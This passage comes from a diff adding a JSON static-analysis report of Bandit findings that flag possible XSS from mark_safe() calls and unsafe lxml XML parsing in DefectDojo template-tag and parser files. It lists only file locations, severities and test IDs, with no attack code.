mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:0f9b1254dd27c226bbcb1844593e4c00335b4dd1c581cb78c4d96ef48d8c933b:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 626, + "end_line": 626, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:122989ed5997ffdb34c840bb23d98b4169d2cc1f28d7975d6074ea5a9ba6555b:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 624, + "end_line": 624, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:122989ed5997ffdb34c840bb23d98b4169d2cc1f28d7975d6074ea5a9ba6555b:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 624, + "end_line": 624, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:1232e36a125a80f7a0026464a727b30d65b781178b035695f7b3e45a2857c57d:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 570, + "end_line": 570, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:1232e36a125a80f7a0026464a727b30d65b781178b035695f7b3e45a2857c57d:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 570, + "end_line": 570, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:1b5d1acdb6ede987d7a341e2c79e09ca9d79a2bc68ede5e05d19e005fc0874b4:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 620, + "end_line": 620, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:1b5d1acdb6ede987d7a341e2c79e09ca9d79a2bc68ede5e05d19e005fc0874b4:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 620, + "end_line": 620, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:27c175394c9e8e6a172c47c86981ef93c4224e0abfa7c62e31a0ff0a9749fca7:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 604, + "end_line": 604, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:27c175394c9e8e6a172c47c86981ef93c4224e0abfa7c62e31a0ff0a9749fca7:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 604, + "end_line": 604, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:2c6421ab3d61d072bb103297b37db1fa2ecce7028d71e976f6ff1d5bd10eb8ee:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 622, + "end_line": 622, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:2c6421ab3d61d072bb103297b37db1fa2ecce7028d71e976f6ff1d5bd10eb8ee:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 622, + "end_line": 622, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:2ef7cedb22cdfbf69d3531f9aad7e1553b6d1bcfa5d65543d304ddd4083ff79e:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 608, + "end_line": 608, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:2ef7cedb22cdfbf69d3531f9aad7e1553b6d1bcfa5d65543d304ddd4083ff79e:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 608, + "end_line": 608, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:41f621be7e6b2d8321b928f81fb20a92f2bbcc8a904fac9431da37bc8cd567bd:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 606, + "end_line": 606, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:41f621be7e6b2d8321b928f81fb20a92f2bbcc8a904fac9431da37bc8cd567bd:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 606, + "end_line": 606, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:443c2db185d3cb20727cfc61ac46870f3f71c37a1fe7c3b62081a44ec6ffe8cd:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 596, + "end_line": 596, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:443c2db185d3cb20727cfc61ac46870f3f71c37a1fe7c3b62081a44ec6ffe8cd:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 596, + "end_line": 596, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:5790a486535a0410f29f0a5aad559e38e99490ef408cf62957fdfd561414fbfa:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 135, + "end_line": 135, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:5790a486535a0410f29f0a5aad559e38e99490ef408cf62957fdfd561414fbfa:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 135, + "end_line": 135, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:64e8d0dc13933001e5c46adc5c9a5f2ff4adb709b184b191bc62a96e5d36bb48:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 108, + "end_line": 108, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:64e8d0dc13933001e5c46adc5c9a5f2ff4adb709b184b191bc62a96e5d36bb48:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 108, + "end_line": 108, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:84623a8efe67663d5136a6024c9732a72188b8372a07de66e5c4609fafc5851a:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 588, + "end_line": 588, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:84623a8efe67663d5136a6024c9732a72188b8372a07de66e5c4609fafc5851a:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 588, + "end_line": 588, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:8d1b7b342ae3a851cc81f019566c59865c337048f544f45189b33c787664bb6e:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 564, + "end_line": 564, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:8d1b7b342ae3a851cc81f019566c59865c337048f544f45189b33c787664bb6e:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 564, + "end_line": 564, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:966faebd1155aa824a0d229514ee2ad0c82cdd061035f3cded93730331c58d7c:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 572, + "end_line": 572, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:966faebd1155aa824a0d229514ee2ad0c82cdd061035f3cded93730331c58d7c:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 572, + "end_line": 572, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:97df1a3d77959fcae6426514e1c53cbcebc65448ddbbe989fbc402489bb8f8b7:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 634, + "end_line": 634, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:97df1a3d77959fcae6426514e1c53cbcebc65448ddbbe989fbc402489bb8f8b7:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 634, + "end_line": 634, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:9c779cbf390307832a61784029abf2614b822c696d06d876aef39fc8c606af46:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 590, + "end_line": 590, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:9c779cbf390307832a61784029abf2614b822c696d06d876aef39fc8c606af46:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 590, + "end_line": 590, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:a0d1cd338707f1d259784c40577dff57578fb4e6b8882e8a9091a6f7530fbbdf:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 616, + "end_line": 616, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:a0d1cd338707f1d259784c40577dff57578fb4e6b8882e8a9091a6f7530fbbdf:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 616, + "end_line": 616, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:c17fee716e095b80cdbd7d54a52de7b16aa8fdac7dc988a9f5c9704d0ea917ce:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 594, + "end_line": 594, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:c17fee716e095b80cdbd7d54a52de7b16aa8fdac7dc988a9f5c9704d0ea917ce:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 594, + "end_line": 594, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:c4c57127d0c3d1964e4c99e1e9f973ef95d7891f621d83e3620efbf9dc12d441:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 592, + "end_line": 592, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:c4c57127d0c3d1964e4c99e1e9f973ef95d7891f621d83e3620efbf9dc12d441:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 592, + "end_line": 592, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:cc7ec564aec514b3b53c574fded8aa38f63f03087fe54fc1d59d490a682abfff:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 60, + "end_line": 60, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:cc7ec564aec514b3b53c574fded8aa38f63f03087fe54fc1d59d490a682abfff:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 60, + "end_line": 60, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:e29c477f99e8f3c200f373b50ed5e5df1030389f41322c3ffffc85a6fdef5d19:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 562, + "end_line": 562, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:e29c477f99e8f3c200f373b50ed5e5df1030389f41322c3ffffc85a6fdef5d19:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 562, + "end_line": 562, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:e7812e2b73f1bd44ff588dbf3ace6114635688bf2c1c380e6889b3cacdd1ba4d:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 337, + "end_line": 337, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:e7812e2b73f1bd44ff588dbf3ace6114635688bf2c1c380e6889b3cacdd1ba4d:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 337, + "end_line": 337, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:e8f95b1755393ef559183fb5027b402377fe8bdd371e3526a58b3cd2f1dac90f:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 642, + "end_line": 642, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:e8f95b1755393ef559183fb5027b402377fe8bdd371e3526a58b3cd2f1dac90f:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 642, + "end_line": 642, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:f249142c577065fc7b2249852f7db81d8c00cf3827c1adcab72bf8cda3abaf77:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 568, + "end_line": 568, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/display_tags.py:f249142c577065fc7b2249852f7db81d8c00cf3827c1adcab72bf8cda3abaf77:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 568, + "end_line": 568, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/display_tags.py:fdde08c891bf6d63b6698dd5291857f417464cde2cf2a8f6f1781ab66b26b6a7:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/display_tags.py", + "start_line": 443, + "end_line": 443, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/navigation_tags.py:459a3afaf3f411633787691308be69132eb7150eadaa69c557f32e2d9f50c261:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/navigation_tags.py", + "start_line": 134, + "end_line": 134, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/navigation_tags.py:8c80a09327a61007c74f10b737ddcf11cc6977819d852ecc8a551fa4ad17bdaf:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/navigation_tags.py", + "start_line": 139, + "end_line": 139, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/navigation_tags.py:aeaab78b80d46c804e7fd0237c0b0272ae6e7fa1a6b87355908f619a27d79c3e:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/navigation_tags.py", + "start_line": 29, + "end_line": 29, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/navigation_tags.py:aeaab78b80d46c804e7fd0237c0b0272ae6e7fa1a6b87355908f619a27d79c3e:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/navigation_tags.py", + "start_line": 29, + "end_line": 29, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Use of mark_safe() may expose cross-site scripting vulnerabilities and should be reviewed.", + "cve": "dojo/templatetags/navigation_tags.py:f80b5bb842ed18247cfa3a639c71b9d249feb116e6c008588ab1e72b98cd1681:B308", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/navigation_tags.py", + "start_line": 77, + "end_line": 77, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B308", + "value": "B308" + } + ] + }, + { + "category": "sast", + "message": "Potential XSS on mark_safe function.", + "cve": "dojo/templatetags/navigation_tags.py:f80b5bb842ed18247cfa3a639c71b9d249feb116e6c008588ab1e72b98cd1681:B703", + "severity": "Medium", + "confidence": "High", + "scanner": { + "id": "bandit", + "name": "Bandit" + }, + "location": { + "file": "dojo/templatetags/navigation_tags.py", + "start_line": 77, + "end_line": 77, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "bandit_test_id", + "name": "Bandit Test ID B703", + "value": "B703" + } + ] + }, + { + "category": "sast", + "message": "Using lxml.etree.parse to parse untrusted XML data is known to be vulnerable to XML attacks. Replace lxml.etree.parse with its defusedxml equivalent function.", + "cve": "dojo/tools/acunetix/parser_helper.py:5624b9f257743c82ff40294c9a7660bb22731d7964a67a456200a713f03d34b4:B320", 